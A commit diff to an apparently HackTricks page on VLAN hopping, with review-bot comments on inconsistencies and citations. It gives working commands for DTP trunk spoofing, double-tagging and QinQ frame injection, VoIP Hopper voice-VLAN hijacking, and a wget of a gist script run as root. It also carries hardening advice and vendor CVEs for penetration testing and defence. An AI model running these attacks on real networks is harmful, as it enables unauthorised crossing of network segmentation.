Add content from: Research Update: Enhanced src/generic-methodologies-and-reso...

This commit is contained in:
HackTricks News Bot 2025-08-07 08:30:36 +00:00
parent 0f0e4e0900
commit 1d5db450d1


@ -31,14 +31,18 @@ Switching to trunk mode will temporarily disrupt connectivity, but this can be r
Virtual interfaces are then created, assigned VLAN IDs, and activated:
```bash
# Legacy (vconfig) still works but deprecated in modern kernels
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up
# Modern (ip-link preferred)
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip link set eth0.10 up
sudo ip link set eth0.20 up
```
Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
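Review bot: the new block under `# Modern (ip-link preferred)` only creates eth0.10 and eth0.20, while the legacy block above it and the `dhclient` commands in the next hunk still use VLANs 50 and 60; either add the two missing `ip link add link eth0 name eth0.50 type vlan id 50` / `... id 60` lines plus their `ip link set ... up`, or say that the pattern is repeated per VLAN, so a reader who copies only the modern block is not left with `dhclient` calls against interfaces that do not exist. Minor: `vconfig` is a userspace tool from the `vlan` package that has been superseded by `ip link`, not something deprecated "in modern kernels"; both variants rely on the same `8021q` kernel module, so the `modprobe 8021q` line belongs before the legacy commands as well.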
@ -46,14 +50,12 @@ Subsequently, an address request is made via DHCP. Alternatively, in cases where
```bash
sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```
Example for manually setting a static IP address on an interface (VLAN 10):
```bash
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
sudo ip addr add 10.10.10.66/24 dev eth0.10
```
Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.
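Review bot: in the static-address block, `sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0` and `sudo ip addr add 10.10.10.66/24 dev eth0.10` are alternatives, not a sequence; run back to back, the second either fails with an "already exists" RTNETLINK error or is silently redundant. Label them the way the previous hunk does (`# Legacy (ifconfig)` / `# Modern (ip addr)`). Same consistency issue as above: `dhclient -v eth0.50` and `eth0.60` are run on sub-interfaces that the modern `ip link` block never creates.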
@ -81,18 +83,18 @@ $ git clone https://github.com/fleetcaptain/dtp-spoof.git
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
```
Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require *vconfig*; instead use *ip link*:
Recon helper (passively fingerprint the ports DTP state):
```bash
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up
$ wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
$ sudo python3 dtpscan.py -i eth0
```
Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.
### 2. Double-Tagging (Native-VLAN Abuse)
If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection:
If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can hop to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2025 refresh) automates the injection:
```bash
python3 DoubleTagging.py \
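Review bot: the recon helper fetches `dtpscan.py` from an unpinned gist raw URL and then runs it under `sudo python3`; pin the URL to a specific gist revision (the raw path accepts a commit hash between `raw/` and the filename) and note a checksum, otherwise whoever controls that gist controls code executed as root on the tester's machine, and the page stops being reproducible the moment the gist changes. Wording and style: "the ports DTP state" needs an apostrophe ("the port's DTP state"); the two `$ ` prompted lines sit inside a block whose other lines carry no prompt, so drop the prompts to match the rest of the page. The old sentence "Modern Linux kernels no longer require *vconfig*" and its `eth0.30` block are being removed here, which is fine since the first section now carries the `ip link` walkthrough that "exactly as shown in the previous section" points to.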
@ -103,15 +105,9 @@ python3 DoubleTagging.py \
--attacker 10.10.1.54
```
Packet walk-through:
1. Outer tag (1) is stripped by the first switch because it matches the native VLAN.
2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20.
The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames .
### 3. QinQ (802.1ad) Stacking
Many enterprise cores support *Q-in-Q* service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy:
Many enterprise cores support *Q-in-Q* service-provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for ethertype `0x88a8` and attempt to pop the outer tag with Scapy:
```python
from scapy.all import *
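Review bot: "accept untagged frames ." at the end of the double-tagging paragraph has a stray space before the period where a citation marker was evidently dropped; either restore the reference (nothing in the References hunk covers this claim) or end the sentence cleanly. The packet walk-through would also benefit from stating the precondition that step 2 depends on: the inner VLAN (20) has to be allowed on the trunk for the frame to go anywhere, which is exactly why item 3 of the defensive section (`switchport trunk allowed vlan 10,20` style pruning) and tagging the native VLAN (item 2) break this technique.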
@ -122,6 +118,24 @@ frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")
```
### 4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing)
Corporate access ports often sit in an *“access + voice”* configuration: untagged data VLAN for the workstation and a tagged voice VLAN advertised through CDP or LLDP-MED. By impersonating an IP phone the attacker can automatically discover and hop into the VoIP VLAN—even when DTP is disabled.
*VoIP Hopper* (packaged in Kali 2025.2) supports CDP, DHCP options **176/242**, and full LLDP-MED spoofing:
```bash
# One-shot discovery & hop
sudo voiphopper -i eth0 -f cisco-7940
# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt)
sudo voiphopper -i eth0 -z
# Result: new sub-interface eth0.<VVID> with a DHCP or static address inside the voice VLAN
```
The technique bypasses data/voice separation and is extremely common on enterprise edge switches in 2025 because LLDP auto-policy is enabled by default on many models .
---
## Defensive Recommendations
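Review bot: "enabled by default on many models ." again carries an orphaned citation (space before the period), and the "extremely common on enterprise edge switches in 2025" assertion has no source in the References hunk; add the reference or soften the wording. The `# Result: new sub-interface eth0.<VVID> ...` line inside the code block describes an outcome rather than a command and reads better as a sentence after the fence. A one-line pointer to the defensive counterpart (the new item 5 in the next hunk: disable or constrain LLDP-MED auto voice policy, plus 802.1X) would make this section self-contained for readers who land on it directly.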
@ -129,8 +143,20 @@ sendp(frame, iface="eth0")
1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`.
2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it: `vlan dot1q tag native`.
3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`.
4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity.
5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
4. Enforce port security, DHCP snooping, dynamic ARP inspection **and 802.1X** to limit rogue Layer-2 activity.
5. Disable LLDP-MED auto voice policies (or lock them to authenticated MAC OUIs) if IP-phone spoofing isnt required.
6. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
---
## Real-World Vendor Vulnerabilities (2022-2024)
Even a perfectly hardened switch configuration can still be undermined by firmware bugs. Recent examples include:
* **CVE-2022-20728† Cisco Aironet/Catalyst Access Points** allow injection from the native VLAN into non-native WLAN VLANs, bypassing wired/wireless segmentation .
* **CVE-2024-20465 (Cisco IOS Industrial Ethernet)** permits ACL bypass on SVIs after toggling Resilient Ethernet Protocol, leaking traffic between VRFs/VLANs. Patch 17.9.5 or later.
Always monitor the vendor advisories for VLAN-related bypass/ACL issues and keep infrastructure images current.
---
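Review bot: item 5's "lock them to authenticated MAC OUIs" conflates two things: an OUI allow-list is not authentication, and it is precisely what the LLDP/CDP phone-spoofing section above defeats, since the spoofing tool presents a phone vendor's identity. Suggest rewording to the control that item 4 already introduces, e.g. "or require 802.1X/MAB authorization for the voice domain so that only authenticated endpoints are placed in the voice VLAN". Typos and format in the same hunk: "isnt" should be "isn't"; the "†" after CVE-2022-20728 has no matching footnote anywhere in the file; the two CVE bullets use different bracketing ("CVE-2022-20728† Cisco Aironet/Catalyst Access Points" vs "CVE-2024-20465 (Cisco IOS Industrial Ethernet)"), pick one; and the first bullet ends with another orphaned " ." citation.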
@ -139,5 +165,7 @@ sendp(frame, iface="eth0")
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
- VLANPWN attack toolkit <https://github.com/casterbytethrowback/VLANPWN>
- Twingate "What is VLAN Hopping?" (Aug 2024) <https://www.twingate.com/blog/glossary/vlan%20hopping>
- VoIP Hopper project <https://github.com/hmgh0st/voiphopper>
- Cisco Advisory “cisco-sa-apvlan-TDTtb4FY” <https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apvlan-TDTtb4FY>
{{#include ../../banners/hacktricks-training.md}}
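Review bot: CVE-2024-20465 in the vendor-vulnerabilities hunk gets no entry here while CVE-2022-20728 is backed by the "cisco-sa-apvlan-TDTtb4FY" advisory link; add the corresponding Cisco advisory so the "Patch 17.9.5 or later" claim is checkable. The two statements that end with an orphaned " ." (double-tagging "still works in 2025" and LLDP auto-policy "enabled by default on many models") also have no matching entry in this list. Style: the first entry uses the `[url](url)` form while the new entries use `<url>` autolinks; keep one form for the whole list.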